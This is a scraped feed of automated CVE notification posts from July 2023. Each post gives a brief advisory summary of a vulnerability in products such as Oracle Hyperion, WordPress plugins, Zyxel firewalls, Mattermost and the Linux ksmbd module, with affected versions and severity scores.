🚨 CVE-2023-22062Vulnerability in the Oracle Hyperion Financial Reporting product of Oracle Hyperion (component: Repository). The supported version that is affected is 11.2.13.0.000. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hyperion Financial Reporting. While the vulnerability is in Oracle Hyperion Financial Reporting, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hyperion Financial Reporting accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hyperion Financial Reporting. CVSS 3.1 Base Score 8.5 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L).🎖@cveNotify |
|
| 2023-07-18 22:58:16 |
🚨 CVE-2023-22037Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: MS Excel Specific). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Web Applications Desktop Integrator, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Web Applications Desktop Integrator accessible data as well as unauthorized read access to a subset of Oracle Web Applications Desktop Integrator accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 6.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L).🎖@cveNotify |
|
| 2023-07-18 22:58:15 |
🚨 CVE-2023-22011Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 5.4 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L).🎖@cveNotify |
|
| 2023-07-18 20:58:12 |
🚨 CVE-2023-2078The "Buy Me a Coffee – Button and Widget Plugin" plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the recieve_post, bmc_disconnect, name_post, and widget_post functions in versions up to, and including, 3.7. This makes it possible for authenticated attackers, with minimal permissions such as subscribers, to update the plugins settings. CVE-2023-25030 may be a duplicate of this issue.🎖@cveNotify |
|
| 2023-07-18 14:58:43 |
🚨 CVE-2021-43306An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the jquery-validation npm package, when an attacker is able to supply arbitrary input to the url2 method🎖@cveNotify |
|
| 2023-07-18 14:58:39 |
🚨 CVE-2021-43308An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the markdown-link-extractor npm package, when an attacker is able to supply arbitrary input to the module's exported function🎖@cveNotify |
|
| 2023-07-18 14:58:38 |
🚨 CVE-2021-43307An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test() method🎖@cveNotify |
|
| 2023-07-18 14:58:37 |
🚨 CVE-2022-27218Jenkins incapptic connect uploader Plugin 1.15 and earlier stores tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-07-18 14:58:36 |
🚨 CVE-2021-4287A vulnerability, which was classified as problematic, was found in ReFirm Labs binwalk up to 2.3.2. Affected is an unknown function of the file src/binwalk/modules/extractor.py of the component Archive Extraction Handler. The manipulation leads to symlink following. It is possible to launch the attack remotely. Upgrading to version 2.3.3 is able to address this issue. The name of the patch is fa0c0bd59b8588814756942fe4cb5452e76c1dcd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216876.🎖@cveNotify |
|
| 2023-07-18 14:58:32 |
🚨 CVE-2021-4240A vulnerability, which was classified as problematic, was found in phpservermon. This affects the function generatePasswordResetToken of the file src/psm/Service/User.php. The manipulation leads to use of predictable algorithm in random number generator. The exploit has been disclosed to the public and may be used. The name of the patch is 3daa804d5f56c55b3ae13bfac368bb84ec632193. It is recommended to apply a patch to fix this issue. The identifier VDB-213717 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-18 14:58:31 |
🚨 CVE-2021-4241A vulnerability, which was classified as problematic, was found in phpservermon. Affected is the function setUserLoggedIn of the file src/psm/Service/User.php. The manipulation leads to use of predictable algorithm in random number generator. The exploit has been disclosed to the public and may be used. The name of the patch is bb10a5f3c68527c58073258cb12446782d223bc3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-213744.🎖@cveNotify |
|
| 2023-07-18 14:58:30 |
🚨 CVE-2021-42522There is a Information Disclosure vulnerability in anjuta/plugins/document-manager/anjuta-bookmarks.c. This issue was caused by the incorrect use of libxml2 API. The vendor forgot to call 'g_free()' to release the return value of 'xmlGetProp()'.🎖@cveNotify |
|
| 2023-07-18 14:58:29 |
🚨 CVE-2023-35352Windows Remote Desktop Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-18 14:58:25 |
🚨 CVE-2023-3607A vulnerability was found in kodbox 1.26. It has been declared as critical. This vulnerability affects the function Execute of the file webconsole.php.txt of the component WebConsole Plug-In. The manipulation leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-233476. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-18 14:58:24 |
🚨 CVE-2023-35360Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-18 14:58:23 |
🚨 CVE-2023-35358Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-18 14:58:22 |
🚨 CVE-2023-35357Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-18 12:58:48 |
🚨 CVE-2015-10122A vulnerability was found in wp-donate Plugin up to 1.4 on WordPress. It has been classified as critical. This affects an unknown part of the file includes/donate-display.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. Upgrading to version 1.5 is able to address this issue. The identifier of the patch is 019114cb788d954c5d1b36d6c62418619e93a757. It is recommended to upgrade the affected component. The identifier VDB-234249 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-18 12:58:47 |
🚨 CVE-2020-36695Incorrect Default Permissions vulnerability in Hitachi Device Manager on Linux (Device Manager Server component), Hitachi Tiered Storage Manager on Linux, Hitachi Replication Manager on Linux, Hitachi Tuning Manager on Linux (Hitachi Tuning Manager server, Hitachi Tuning Manager - Agent for RAID, Hitachi Tuning Manager - Agent for NAS components), Hitachi Compute Systems Manager on Linux allows File Manipulation.This issue affects Hitachi Device Manager: before 8.8.5-02; Hitachi Tiered Storage Manager: before 8.8.5-02; Hitachi Replication Manager: before 8.8.5-02; Hitachi Tuning Manager: before 8.8.5-02; Hitachi Compute Systems Manager: before 8.8.3-08.🎖@cveNotify |
|
| 2023-07-18 12:58:46 |
🚨 CVE-2021-43072A buffer copy without checking size of input ('classic buffer overflow') in Fortinet FortiAnalyzer version 7.0.2 and below, version 6.4.7 and below, version 6.2.9 and below, version 6.0.11 and below, version 5.6.11 and below, FortiManager version 7.0.2 and below, version 6.4.7 and below, version 6.2.9 and below, version 6.0.11 and below, version 5.6.11 and below, FortiOS version 7.0.0 through 7.0.4, 6.4.0 through 6.4.8, 6.2.0 through 6.2.10, 6.0.x and FortiProxy version 7.0.0 through 7.0.3, 2.0.0 through 2.0.8, 1.2.x, 1.1.x and 1.0.x allows attacker to execute unauthorized code or commands via crafted CLI `execute restore image` and `execute certificate remote` operations with the tFTP protocol.🎖@cveNotify |
|
| 2023-07-18 12:58:45 |
🚨 CVE-2023-31998A heap overflow vulnerability found in EdgeRouters and Aircubes allows a malicious actor to interrupt UPnP service to said devices.🎖@cveNotify |
|
| 2023-07-18 12:58:44 |
🚨 CVE-2023-31998A heap overflow vulnerability found in EdgeRouters and Aircubes allows a malicious actor to interrupt UPnP service to said devices.🎖@cveNotify |
|
| 2023-07-18 12:58:40 |
🚨 CVE-2023-34142Cleartext Transmission of Sensitive Information vulnerability in Hitachi Device Manager on Windows, Linux (Device Manager Server, Device Manager Agent, Host Data Collector components) allows Interception.This issue affects Hitachi Device Manager: before 8.8.5-02.🎖@cveNotify |
|
| 2023-07-18 12:58:39 |
🚨 CVE-2023-34143Improper Validation of Certificate with Host Mismatch vulnerability in Hitachi Device Manager on Windows, Linux (Device Manager Server, Device Manager Agent, Host Data Collector components) allows Man in the Middle Attack.This issue affects Hitachi Device Manager: before 8.8.5-02.🎖@cveNotify |
|
| 2023-07-18 12:58:38 |
🚨 CVE-2023-3403The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'pm_upload_csv' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to import new users and update existing users.🎖@cveNotify |
|
| 2023-07-18 12:58:37 |
🚨 CVE-2023-38434xHTTP 72f812d has a double free in close_connection in xhttp.c via a malformed HTTP request method.🎖@cveNotify |
|
| 2023-07-18 12:58:36 |
🚨 CVE-2023-3459The Export and Import Users and Customers plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hf_update_customer' function called via an AJAX action in versions up to, and including, 2.4.1. This makes it possible for authenticated attackers, with shop manager-level permissions to change user passwords and potentially take over administrator accounts.🎖@cveNotify |
|
| 2023-07-18 12:58:32 |
🚨 CVE-2023-3708Several themes for WordPress by DeoThemes are vulnerable to Reflected Cross-Site Scripting via breadcrumbs in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-18 12:58:31 |
🚨 CVE-2023-3709The Royal Elementor Addons plugin for WordPress is vulnerable to unauthenticated API key disclosure in versions up to, and including, 1.3.70 due to the plugin adding the API key to the source code of any page running the MailChimp block. This makes it possible for unauthenticated attackers to obtain a site's MailChimp API key. We recommend resetting any MailChimp API keys if running a vulnerable version of this plugin with the MailChimp block enabled as the API key may have been compromised.🎖@cveNotify |
|
| 2023-07-18 12:58:30 |
🚨 CVE-2023-3713The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'profile_magic_check_smtp_connection' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily. This can be used by attackers to achieve privilege escalation.🎖@cveNotify |
|
| 2023-07-18 12:58:29 |
🚨 CVE-2023-3714The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'edit_group' handler in versions up to, and including, 5.5.2. This makes it possible for authenticated attackers, with group ownership, to update group options, including the 'associate_role' parameter, which defines the member's role. This issue was partially patched in version 5.5.2 preventing privilege escalation, however, it was fully patched in 5.5.3.🎖@cveNotify |
|
| 2023-07-18 12:58:28 |
🚨 CVE-2022-4146Expression Language Injection vulnerability in Hitachi Replication Manager on Windows, Linux, Solaris allows Code Injection.This issue affects Hitachi Replication Manager: before 8.8.5-02.🎖@cveNotify |
|
| 2023-07-18 12:58:24 |
🚨 CVE-2023-34139A command injection vulnerability in the Free Time WiFi hotspot feature of the Zyxel USG FLEX series firmware versions 4.50 through 5.36 Patch 2 and VPN series firmware versions 4.20 through 5.36 Patch 2, could allow an unauthenticated, LAN-based attacker to execute some OS commands on an affected device.🎖@cveNotify |
|
| 2023-07-18 12:58:23 |
🚨 CVE-2023-38428An issue was discovered in the Linux kernel before 6.3.4. fs/ksmbd/smb2pdu.c in ksmbd does not properly check the UserName value because it does not consider the address of security buffer, leading to an out-of-bounds read.🎖@cveNotify |
|
| 2023-07-18 12:58:22 |
🚨 CVE-2023-38429An issue was discovered in the Linux kernel before 6.3.4. fs/ksmbd/connection.c in ksmbd has an off-by-one error in memory allocation (because of ksmbd_smb2_check_message) that may lead to out-of-bounds access.🎖@cveNotify |
|
| 2023-07-18 12:58:21 |
🚨 CVE-2023-38429An issue was discovered in the Linux kernel before 6.3.4. fs/ksmbd/connection.c in ksmbd has an off-by-one error in memory allocation (because of ksmbd_smb2_check_message) that may lead to out-of-bounds access.🎖@cveNotify |
|
| 2023-07-18 12:58:20 |
🚨 CVE-2023-38431An issue was discovered in the Linux kernel before 6.3.8. fs/smb/server/connection.c in ksmbd does not validate the relationship between the NetBIOS header's length field and the SMB header sizes, via pdu_size in ksmbd_conn_handler_loop, leading to an out-of-bounds read.🎖@cveNotify |
|
| 2023-07-17 23:58:19 |
🚨 CVE-2023-25086Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to arbitrary code execution. An attacker with high privileges can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the firewall_handler_set function with the index and dport variables.🎖@cveNotify |
|
| 2023-07-17 23:58:18 |
🚨 CVE-2023-25091Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to arbitrary code execution. An attacker with high privileges can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the handle_interface_acl function with the interface variable when out_acl is -1.🎖@cveNotify |
|
| 2023-07-17 23:58:16 |
🚨 CVE-2023-25093Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to arbitrary code execution. An attacker with high privileges can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_qos function with the class_name variable..🎖@cveNotify |
|
| 2023-07-17 23:58:15 |
🚨 CVE-2023-24018A stack-based buffer overflow vulnerability exists in the libzebra.so.0.0.0 security_decrypt_password functionality of Milesight UR32L v32.3.0.5. A specially crafted HTTP request can lead to a buffer overflow. An authenticated attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-17 23:58:14 |
🚨 CVE-2023-25096Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to arbitrary code execution. An attacker with high privileges can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_qos function with the rule_name variable with two possible format strings.🎖@cveNotify |
|
| 2023-07-17 23:58:13 |
🚨 CVE-2023-25100Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to arbitrary code execution. An attacker with high privileges can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_qos function with the default_class variable.🎖@cveNotify |
|
| 2023-07-17 20:58:35 |
🚨 CVE-2023-35697Improper Restriction of Excessive Authentication Attempts in the SICK ICR890-4could allow a remote attacker to brute-force user credentials.🎖@cveNotify |
|
| 2023-07-17 20:58:34 |
🚨 CVE-2023-34141A command injection vulnerability in the access point (AP) management feature of the Zyxel ATP series firmware versions 5.00 through 5.36 Patch 2, USG FLEX series firmware versions 5.00 through 5.36 Patch 2, USG FLEX 50(W) series firmware versions 5.00 through 5.36 Patch 2, USG20(W)-VPN series firmware versions 5.00 through 5.36 Patch 2, VPN series firmware versions 5.00 through 5.36 Patch 2, NXC2500 firmware versions 6.10(AAIG.0) through 6.10(AAIG.3), and NXC5500 firmware versions 6.10(AAOS.0) through 6.10(AAOS.4), could allow an unauthenticated, LAN-based attacker to execute some OS commands on an affected device if the attacker could trick an authorized administrator to add their IP address to the managed AP list in advance.🎖@cveNotify |
|
| 2023-07-17 20:58:33 |
🚨 CVE-2023-33012A command injection vulnerability in the configuration parser of the Zyxel ATP series firmware versions 5.10 through 5.36 Patch 2, USG FLEX series firmware versions 5.00 through 5.36 Patch 2, USG FLEX 50(W) series firmware versions 5.10 through 5.36 Patch 2, USG20(W)-VPN series firmware versions 5.10 through 5.36 Patch 2, and VPN series firmware versions 5.00 through 5.36 Patch 2, could allow an unauthenticated, LAN-based attacker to execute some OS commands by using a crafted GRE configuration when the cloud management mode is enabled.🎖@cveNotify |
|
| 2023-07-17 20:58:32 |
🚨 CVE-2023-34139A command injection vulnerability in the Free Time WiFi hotspot feature of in the Zyxel USG FLEX series firmware versions 4.50 through 5.36 Patch 2 and VPN series firmware versions 4.20 through 5.36 Patch 2, could allow an unauthenticated, LAN-based attacker to execute some OS commands on an affected device.🎖@cveNotify |
|
| 2023-07-17 20:58:28 |
🚨 CVE-2023-34140A buffer overflow vulnerability in the Zyxel ATP series firmware versions 4.32 through 5.36 Patch 2, USG FLEX series firmware versions 4.50 through 5.36 Patch 2, USG FLEX 50(W) series firmware versions 4.16 through 5.36 Patch 2, USG20(W)-VPN series firmware versions 4.16 through 5.36 Patch 2, VPN series firmware versions 4.30 through 5.36 Patch 2, NXC2500 firmware versions 6.10(AAIG.0) through 6.10(AAIG.3), and NXC5500 firmware versions 6.10(AAOS.0) through 6.10(AAOS.4), could allow an unauthenticated, LAN-based attacker to cause denial of service (DoS) conditions by sending a crafted request to the CAPWAP daemon.🎖@cveNotify |
|
| 2023-07-17 20:58:27 |
🚨 CVE-2023-34451CometBFT is a Byzantine Fault Tolerant (BFT) middleware that takes a state transition machine and replicates it on many machines. The mempool maintains two data structures to keep track of outstanding transactions: a list and a map.These two data structures are supposed to be in sync all the time in the sense that the map tracks the index (if any) of the transaction in the list. In `v0.37.0`, and `v0.37.1`, as well as in `v0.34.28`, and all previous releases of the CometBFT repo2, it is possible to have them out of sync. When this happens, the list may contain several copies of the same transaction. Because the map tracks a single index, it is then no longer possible to remove all the copies of the transaction from the list. This happens even if the duplicated transaction is later committed in a block. The only way to remove the transaction is by restarting the node.The above problem can be repeated on and on until a sizable number of transactions are stuck in the mempool, in order to try to bring down the target node. The problem is fixed in releases `v0.34.29` and `v0.37.2`. Some workarounds are available. Increasing the value of `cache_size` in `config.toml` makes it very difficult to effectively attack a full node. Not exposing the transaction submission RPC's would mitigate the probability of a successful attack, as the attacker would then have to create a modified (byzantine) full node to be able to perform the attack via p2p.🎖@cveNotify |
|
| 2023-07-17 20:58:26 |
🚨 CVE-2023-36829Sentry is an error tracking and performance monitoring platform. Starting in version 23.6.0 and prior to version 23.6.2, the Sentry API incorrectly returns the `access-control-allow-credentials: true` HTTP header if the `Origin` request header ends with the `system.base-hostname` option of Sentry installation. This only affects installations that have `system.base-hostname` option explicitly set, as it is empty by default. Impact is limited since recent versions of major browsers have cross-site cookie blocking enabled by default. However, this flaw could allow other multi-step attacks. The patch has been released in Sentry 23.6.2.🎖@cveNotify |
|
| 2023-07-17 20:58:25 |
🚨 CVE-2023-34450CometBFT is a Byzantine Fault Tolerant (BFT) middleware that takes a state transition machine and replicates it on many machines. An internal modification made in versions 0.34.28 and 0.37.1 to the way struct `PeerState` is serialized to JSON introduced a deadlock when new function MarshallJSON is called. This function can be called from two places. The first is via logs, setting the `consensus` logging module to "debug" level (should not happen in production), and setting the log output format to JSON. The second is via RPC `dump_consensus_state`.Case 1, which should not be hit in production, will eventually hit the deadlock in most goroutines, effectively halting the node.In case 2, only the data structures related to the first peer will be deadlocked, together with the thread(s) dealing with the RPC request(s). This means that only one of the channels of communication to the node's peers will be blocked. Eventually the peer will timeout and excluded from the list (typically after 2 minutes). The goroutines involved in the deadlock will not be garbage collected, but they will not interfere with the system after the peer is excluded.The theoretical worst case for case 2, is a network with only two validator nodes. In this case, each of the nodes only has one `PeerState` struct. If `dump_consensus_state` is called in either node (or both), the chain will halt until the peer connections time out, after which the nodes will reconnect (with different `PeerState` structs) and the chain will progress again. Then, the same process can be repeated.As the number of nodes in a network increases, and thus, the number of peer struct each node maintains, the possibility of reproducing the perturbation visible with two nodes decreases. Only the first `PeerState` struct will deadlock, and not the others (RPC `dump_consensus_state` accesses them in a for loop, so the deadlock at the first iteration causes the rest of the iterations of that "for" loop to never be reached).This regression was fixed in versions 0.34.29 and 0.37.2. Some workarounds are available. For case 1 (hitting the deadlock via logs), either don't set the log output to "json", leave at "plain", or don't set the consensus logging module to "debug", leave it at "info" or higher. For case 2 (hitting the deadlock via RPC `dump_consensus_state`), do not expose `dump_consensus_state` RPC endpoint to the public internet (e.g., via rules in one's nginx setup).🎖@cveNotify |
|
| 2023-07-17 20:58:24 |
🚨 CVE-2023-36814Products.CMFCore are the key framework services for the Zope Content Management Framework (CMF). The use of Python's marshal module to handle unchecked input in a public method on `PortalFolder` objects can lead to an unauthenticated denial of service and crash situation. The code in question is exposed by all portal software built on top of `Products.CMFCore`, such as Plone. All deployments are vulnerable. The code has been fixed in `Products.CMFCore` version 3.2.🎖@cveNotify |
|
| 2023-07-17 20:58:21 |
🚨 CVE-2023-36940Cross Site Scripting (XSS) vulnerability in PHPGurukul Online Fire Reporting System Using PHP and MySQL v.1.2 allows attackers to execute arbitrary code via a crafted payload injected into the search field.🎖@cveNotify |
|
| 2023-07-17 20:58:20 |
🚨 CVE-2023-37192Memory management and protection issues in Bitcoin Core v22 allows attackers to modify the stored sending address within the app's memory, potentially allowing them to redirect Bitcoin transactions to wallets of their own choosing.🎖@cveNotify |
|
| 2023-07-17 20:58:19 |
🚨 CVE-2023-3599A vulnerability was found in SourceCodester Best Fee Management System 1.0. It has been rated as critical. Affected by this issue is the function save_user of the file admin_class.php of the component Add User Handler. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-233450 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-17 20:58:18 |
🚨 CVE-2023-34347?Delta Electronics InfraSuite Device Master versions prior to 1.0.7 contains classes that cannot be deserialized, which could allow an attack to remotely execute arbitrary code. 🎖@cveNotify |
|
| 2023-07-17 20:58:14 |
🚨 CVE-2023-30765?Delta Electronics InfraSuite Device Master versions prior to 1.0.7 contain improper access controls that could allow an attacker to alter privilege management configurations, resulting in privilege escalation.🎖@cveNotify |
|
| 2023-07-17 20:58:13 |
🚨 CVE-2023-34316?An attacker could bypass the latest Delta Electronics InfraSuite Device Master (versions prior to 1.0.7) patch, which could allow an attacker to retrieve file contents.🎖@cveNotify |
|
| 2023-07-17 20:58:12 |
🚨 CVE-2023-3139The Protect WP Admin WordPress plugin before 4.0 discloses the URL of the admin panel via a redirection of a crafted URL, bypassing the protection offered.🎖@cveNotify |
|
| 2023-07-17 18:58:42 |
🚨 CVE-2023-3577Mattermost fails to properly restrict requests to localhost/intranet during the interactive dialog, which could allow an attacker to perform a limited blind SSRF.🎖@cveNotify |
|
| 2023-07-17 18:58:41 |
🚨 CVE-2023-3581Mattermost fails to properly validate the origin of a websocket connection allowing a MITM attacker on Mattermost to access the websocket APIs.🎖@cveNotify |
|
| 2023-07-17 18:58:40 |
🚨 CVE-2023-3582Mattermost fails to verify channel membership when linking a board to a channel allowing a low-privileged authenticated user to link a Board to a private channel they don't have access to, 🎖@cveNotify |
|
| 2023-07-17 18:58:38 |
🚨 CVE-2023-3584Mattermost fails to properly check the authorization of POST /api/v4/teams when passing a team override scheme ID in the request, allowing an authenticated attacker with knowledge of a Team Override Scheme ID to create a new team with said team override scheme.🎖@cveNotify |
|
| 2023-07-17 18:58:37 |
🚨 CVE-2023-3585Mattermost Boards fail to properly validate a board link, allowing an attacker to crash a channel by posting a specially crafted boards link.🎖@cveNotify |
|
| 2023-07-17 18:58:36 |
🚨 CVE-2023-3586Mattermost fails to disable public Boards after the "Enable Publicly-Shared Boards" configuration option is disabled, resulting in previously-shared public Boards to remain accessible.🎖@cveNotify |
|
| 2023-07-17 18:58:35 |
🚨 CVE-2023-3587Mattermost fails to properly show information in the UI, allowing a system admin to modify a board state allowing any user with a valid sharing link to join the board with editor access, without the UI showing the updated permissions.🎖@cveNotify |
|
| 2023-07-17 18:58:34 |
🚨 CVE-2023-3590Mattermost fails to delete card attachments in Boards, allowing an attacker to access deleted attachments.🎖@cveNotify |
|
| 2023-07-17 18:58:33 |
🚨 CVE-2023-3591Mattermost fails to invalidate previously generated password reset tokens when a new reset token was created.🎖@cveNotify |
|
| 2023-07-17 18:58:32 |
🚨 CVE-2023-3593Mattermost fails to properly validate markdown, allowing an attacker to crash the server via a specially crafted markdown input.🎖@cveNotify |
|
| 2023-07-17 18:58:30 |
🚨 CVE-2023-3613Mattermost WelcomeBot plugin fails to to validate the membership status when inviting or adding users to channels allowing guest accounts to be added or invited to channels by default. 🎖@cveNotify |
|
| 2023-07-17 18:58:29 |
🚨 CVE-2023-3614Mattermost fails to properly validate a gif image file, allowing an attacker to consume a significant amount of server resources, making the server unresponsive for an extended period of time by linking to specially crafted image file.🎖@cveNotify |
|
| 2023-07-17 18:58:28 |
🚨 CVE-2023-3615Mattermost iOS app fails to properly validate the server certificate while initializing the TLS connection allowing a network attacker to intercept the WebSockets connection.🎖@cveNotify |
|
| 2023-07-17 18:58:27 |
🚨 CVE-2021-37386Furukawa 423-41W/AC before v1.1.4 and LD421-21W before v1.3.3 were discovered to contain an HTML injection vulnerability via the serial number update function.🎖@cveNotify |
|
| 2023-07-17 18:58:25 |
🚨 CVE-2023-28767The configuration parser fails to sanitize user-controlled input in the Zyxel ATP series firmware versions 5.10 through 5.36, USG FLEX series firmware versions 5.00 through 5.36, USG FLEX 50(W) series firmware versions 5.10 through 5.36, USG20(W)-VPN series firmware versions 5.10 through 5.36, and VPN series firmware versions 5.00 through 5.36. An unauthenticated, LAN-based attacker could leverage the vulnerability to inject some operating system (OS) commands into the device configuration data on an affected device when the cloud management mode is enabled.🎖@cveNotify |
|
| 2023-07-17 18:58:24 |
🚨 CVE-2023-34669TOTOLINK CP300+ V5.2cu.7594 contains a Denial of Service vulnerability in function RebootSystem of the file lib/cste_modules/system which can reboot the system.🎖@cveNotify |
|
| 2023-07-17 18:58:23 |
🚨 CVE-2023-37475Hamba avro is a go lang encoder/decoder implementation of the avro codec specification. In affected versions a well-crafted string passed to avro's `github.com/hamba/avro/v2.Unmarshal()` can throw a `fatal error: runtime: out of memory` which is unrecoverable and can cause denial of service of the consumer of avro. The root cause of the issue is that avro uses part of the input to `Unmarshal()` to determine the size when creating a new slice and hence an attacker may consume arbitrary amounts of memory which in turn may cause the application to crash. This issue has been addressed in commit `b4a402f4` which has been included in release version `2.13.0`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-17 18:58:22 |
🚨 CVE-2023-31853Cudy LT400 1.13.4 is vulnerable Cross Site Scripting (XSS) in /cgi-bin/luci/admin/network/bandwidth via the icon parameter.🎖@cveNotify |
|
| 2023-07-17 16:58:23 |
🚨 CVE-2021-39182EnroCrypt is a Python module for encryption and hashing. Prior to version 1.1.4, EnroCrypt used the MD5 hashing algorithm in the hashing file. Beginners who are unfamiliar with hashes can face problems as MD5 is considered an insecure hashing algorithm. The vulnerability is patched in v1.1.4 of the product. As a workaround, users can remove the `MD5` hashing function from the file `hashing.py`.🎖@cveNotify |
|
| 2023-07-17 16:58:21 |
🚨 CVE-2021-39190The SCCM plugin for GLPI is a plugin to synchronize computers from SCCM (version 1802) to GLPI. In versions prior to 2.3.0, the Configuration page is publicly accessible in read-only mode. This issue is patched in version 2.3.0. No known workarounds exist.🎖@cveNotify |
|
| 2023-07-17 16:58:20 |
🚨 CVE-2021-39193Frontier is Substrate's Ethereum compatibility layer. Prior to commit number 0b962f218f0cdd796dadfe26c3f09e68f7861b26, a bug in `pallet-ethereum` can cause invalid transactions to be included in the Ethereum block state in `pallet-ethereum` due to not validating the input data size. Any invalid transactions included this way have no possibility to alter the internal Ethereum or Substrate state. The transaction will appear to have be included, but is of no effect as it is rejected by the EVM engine. The impact is further limited by Substrate extrinsic size constraints. A patch is available in commit number 0b962f218f0cdd796dadfe26c3f09e68f7861b26. There are no workarounds aside from applying the patch.🎖@cveNotify |
|
| 2023-07-17 16:58:19 |
🚨 CVE-2022-4872The Chained Products WordPress plugin before 2.12.0 does not have authorisation and CSRF checks, as well as does not ensure that the option to be updated belong to the plugin, allowing unauthenticated attackers to set arbitrary options to 'no'🎖@cveNotify |
|
| 2023-07-17 16:58:17 |
🚨 CVE-2022-4700The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_activate_required_theme' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to activate the 'royal-elementor-kit' theme. If no such theme is installed doing so can also impact site availability as the site attempts to load a nonexistent theme.🎖@cveNotify |
|
| 2023-07-17 16:58:16 |
🚨 CVE-2022-4722Authentication Bypass by Primary Weakness in GitHub repository ikus060/rdiffweb prior to 2.5.5.🎖@cveNotify |
|
| 2023-07-17 16:58:15 |
🚨 CVE-2022-4734Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2023-07-17 16:58:13 |
🚨 CVE-2022-4811Incorrect Authorization in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2023-07-17 14:58:12 |
🚨 CVE-2023-2912Use After Free vulnerability in Secomea SiteManager Embedded allows Obstruction.🎖@cveNotify |
|
| 2023-07-17 13:58:12 |
